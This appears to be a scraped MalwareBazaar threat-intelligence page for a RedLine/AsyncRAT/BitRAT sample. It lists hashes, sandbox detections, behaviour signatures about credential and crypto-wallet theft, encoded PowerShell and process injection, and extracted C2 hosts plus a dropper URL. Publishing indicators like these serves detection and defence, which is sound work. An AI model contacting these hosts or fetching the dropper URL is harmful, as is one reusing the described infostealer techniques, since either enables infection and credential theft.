MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 21b8d4abd97f566a604e26b415a59cbfea70a45dac5f704140c331d7784a134e. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


RedLineStealer


Vendor detections: 10


Intelligence 10 IOCs 1 YARA File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 21b8d4abd97f566a604e26b415a59cbfea70a45dac5f704140c331d7784a134e
SHA3-384 hash: 63213e84d168f97dafe4b322431f48cf0c2d4624db3531ffcc3b39671efbad8181c782d3a260de43600db42aa66958c2
SHA1 hash: 14bfaa9fd0bb6d94ff3207eeeffa0237f12b49c3
MD5 hash: 1d3e0b736692cb1ccafe74c27e1a0c15
humanhash: london-dakota-october-artist
File name:21B8D4ABD97F566A604E26B415A59CBFEA70A45DAC5F7.exe
Download: download sample
Signature RedLineStealer
Create hunting rule
File size:159'744 bytes
First seen:2022-03-03 18:26:50 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash 4cea7ae85c87ddc7295d39ff9cda31d1 (85 x RedLineStealer, 70 x LummaStealer, 61 x Rhadamanthys)
ssdeep 1536:PxmqWRQtRpKM5/gR94hUrClTe1z/s5gQSHf0gsEltGbVx4LYM:ZBtaM5EWCrATe1zU50Hi4cM
Threatray 700 similar samples on MalwareBazaar
TLSH T156F3C78736C0C49CDE7917F652A60041B3B5BCFBDA28A29F2BCD62661FE21D1583171B
File icon (PE):PE icon
dhash icon b2909696969ef66a (5 x RemcosRAT, 3 x NanoCore, 2 x njrat)
Reporter abuse_ch
Tags:exe RedLineStealer


Avatar
abuse_ch
RedLineStealer C2:
172.83.152.87:17677

Indicators Of Compromise (IOCs)

Below is a list of indicators of compromise (IOCs) associated with this malware samples.

IOCThreatFox Reference
172.83.152.87:17677 https://threatfox.abuse.ch/ioc/392359/

Intelligence

File Origin
# of uploads :
1
# of downloads :
256
Origin country :
n/a
Vendor Threat Intelligence
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/247080/
Detection(s):
SecuriteInfo.com.JS.Obfus-745.UNOFFICIAL
Create hunting rule

Sanesecurity.Malware.26618.JsHeur.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Trojan.Inject4.18513.31275.18664.UNOFFICIAL
Create hunting rule

Result
Verdict:
Malware
Maliciousness:

Behaviour
Creating a file in the %temp% subdirectories
Running batch commands
Creating a process with a hidden window
Сreating synchronization primitives
Creating a process from a recently created file
Creating a window
Launching a process
Sending an HTTP GET request
Creating a file in the %AppData% directory
DNS request
Downloading the file
Result
Malware family:
n/a
Score:
  8/10
Tags:
n/a
Link:
https://dragonfly.certego.net/analysis/8144/overview
Behaviour
MalwareBazaar
SystemUptime
MeasuringTime
EvasionGetTickCount
EvasionQueryPerformanceCounter
Result
Verdict:
MALICIOUS
Details
Windows PE Executable
Found a Windows Portable Executable (PE) binary. Depending on context, the presence of a binary is suspicious or malicious.
Verdict:
Suspicious
Link:
https://analyze.intezer.com/analyses/17fdc635-0628-42f3-aac2-16fadd7dca91
Result
Threat name:
AsyncRAT BitRAT RedLine
Create hunting rule
Detection:
malicious
Classification:
bank.troj.spyw.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/950293
Signature
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates files in alternative data streams (ADS)
Creates multiple autostart registry keys
Encrypted powershell cmdline option found
Found malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential evasive VBS script found (sleep loop)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Suspicious powershell command line found
Uses dynamic DNS services
Uses known network protocols on non-standard ports
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected AsyncRAT
Yara detected BitRAT
Yara detected Generic Downloader
Yara detected RedLine Stealer
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 582770 Sample: 21B8D4ABD97F566A604E26B415A... Startdate: 03/03/2022 Architecture: WINDOWS Score: 100 76 zerocool888.duckdns.org 2->76 78 store-images.s-microsoft.com 2->78 80 2 other IPs or domains 2->80 104 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->104 106 Found malware configuration 2->106 108 Malicious sample detected (through community Yara rule) 2->108 110 18 other signatures 2->110 15 21B8D4ABD97F566A604E26B415A59CBFEA70A45DAC5F7.exe 1 3 2->15         started        19 rundll32.exe 2->19         started        signatures3 process4 file5 74 C:\Users\user\AppData\Local\Temp\...\0.vbs, ASCII 15->74 dropped 90 Creates multiple autostart registry keys 15->90 21 cmd.exe 3 2 15->21         started        signatures6 process7 signatures8 114 Malicious encrypted Powershell command line found 21->114 116 Wscript starts Powershell (via cmd or directly) 21->116 118 Very long command line found 21->118 120 Encrypted powershell cmdline option found 21->120 24 wscript.exe 1 21->24         started        27 conhost.exe 21->27         started        process9 signatures10 122 Malicious encrypted Powershell command line found 24->122 124 Wscript starts Powershell (via cmd or directly) 24->124 126 Very long command line found 24->126 29 cmd.exe 1 24->29         started        32 conhost.exe 24->32         started        process11 signatures12 146 Malicious encrypted Powershell command line found 29->146 148 Wscript starts Powershell (via cmd or directly) 29->148 150 Very long command line found 29->150 152 Encrypted powershell cmdline option found 29->152 34 powershell.exe 14 20 29->34         started        39 conhost.exe 29->39         started        process13 dnsIp14 82 2.56.57.147, 49766, 49767, 49770 GBTCLOUDUS Netherlands 34->82 68 C:\Users\...\Windowj98d7shfiuUIUihdsa7h.vbs, ASCII 34->68 dropped 112 Potential evasive VBS script found (sleep loop) 34->112 41 wscript.exe 1 34->41         started        file15 signatures16 process17 signatures18 128 Wscript starts Powershell (via cmd or directly) 41->128 130 Very long command line found 41->130 44 cmd.exe 1 41->44         started        47 cmd.exe 41->47         started        process19 signatures20 140 Wscript starts Powershell (via cmd or directly) 44->140 142 Very long command line found 44->142 144 Encrypted powershell cmdline option found 44->144 49 powershell.exe 14 44->49         started        52 conhost.exe 44->52         started        process21 signatures22 92 Writes to foreign memory regions 49->92 94 Injects a PE file into a foreign processes 49->94 54 InstallUtil.exe 2 4 49->54         started        58 InstallUtil.exe 49->58         started        61 reg.exe 49->61         started        63 2 other processes 49->63 process23 dnsIp24 84 zerocool888.duckdns.org 172.83.152.87, 17677, 49771, 49775 SPARTANHOSTGB United States 54->84 70 C:\Users\user\AppData\Local\Temp\rline.vbs, ASCII 54->70 dropped 65 cmd.exe 54->65         started        86 192.168.2.1 unknown unknown 58->86 88 agences.ddns.net 58->88 72 C:\Users\user\AppData\Local:03-03-2022, HTML 58->72 dropped 132 Creates files in alternative data streams (ADS) 58->132 134 Hides threads from debuggers 58->134 136 Creates autostart registry keys with suspicious values (likely registry only malware) 61->136 138 Creates multiple autostart registry keys 61->138 file25 signatures26 process27 signatures28 96 Suspicious powershell command line found 65->96 98 Wscript starts Powershell (via cmd or directly) 65->98 100 Encrypted powershell cmdline option found 65->100 102 Bypasses PowerShell execution policy 65->102
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/21b8d4abd97f566a604e26b415a59cbfea70a45dac5f704140c331d7784a134e/
Threat name:
Win64.Backdoor.DcRat
Create hunting rule
Status:
Malicious
First seen:
2022-02-25 11:13:27 UTC
File Type:
PE+ (Exe)
Extracted files:
13
AV detection:
16 of 27 (59.26%)
Threat level:
  5/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=eg4njk6zp5lguycoe22bljm4x7vhbjc5vrpxaqkaymy5o6ckcnha._file
Verdict:
malicious
Label(s):
asyncrat
Create hunting rule
Similar samples:
3bf5f251905471ab07782554a58cfa444e4693c4b1ecad16471c489924fd1fe3
RedLineStealer
414a79e6c87489cb73e9176e867d554788a28ba86cb4e00f3f8fed15400999bd
RedLineStealer
51af4d4e1af93fd32fd240a7ec9df52e2af9f7d7567c7f7dff776ce0b4852323
RedLineStealer
704e26dbdebc8b3ad1391f5b9d671f8b9550609455821540151ff70e17bed798
RedLineStealer
888497ac8f3cb030dc34d198ef8e307fab6b129f31f4fc9c41ea78f94d831529
RedLineStealer
ad29674b1a2bcc3ff4ef5746d9317740ab72b016ee3b89ac9aa9871bcb378b6b
RedLineStealer
d9f858f28cab427ea59133d06469903d937cd10334a0fdd5f77fe529e3d0ece1
RedLineStealer
+ 690 additional samples on MalwareBazaar
Result
Malware family:
redline
Create hunting rule
Score:
  10/10
Tags:
family:asyncrat family:bitrat family:redline botnet:ale botnet:default infostealer persistence rat spyware trojan upx
Link:
https://tria.ge/reports/220303-w3q96acbd9/
Behaviour
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
Checks computer location settings
Blocklisted process makes network request
UPX packed file
Async RAT payload
AsyncRat
BitRAT
RedLine
RedLine Payload
Malware Config
C2 Extraction:
zerocool888.duckdns.org:8848
agences.ddns.net:5001
zerocool888.duckdns.org:17677
Dropper Extraction:
http://2.56.57.147/2dll/07.01.22.installutil.txt
Unpacked files
SH256 hash:
21b8d4abd97f566a604e26b415a59cbfea70a45dac5f704140c331d7784a134e
MD5 hash:
1d3e0b736692cb1ccafe74c27e1a0c15
SHA1 hash:
14bfaa9fd0bb6d94ff3207eeeffa0237f12b49c3
Link:
https://www.unpac.me/results/1980a724-42b0-46c5-bf85-27c1794ddfd6/
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/21b8d4abd97f566a604e26b415a59cbfea70a45dac5f704140c331d7784a134e

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Cape
Cape
https://www.capesandbox.com/analysis/247080/

Comments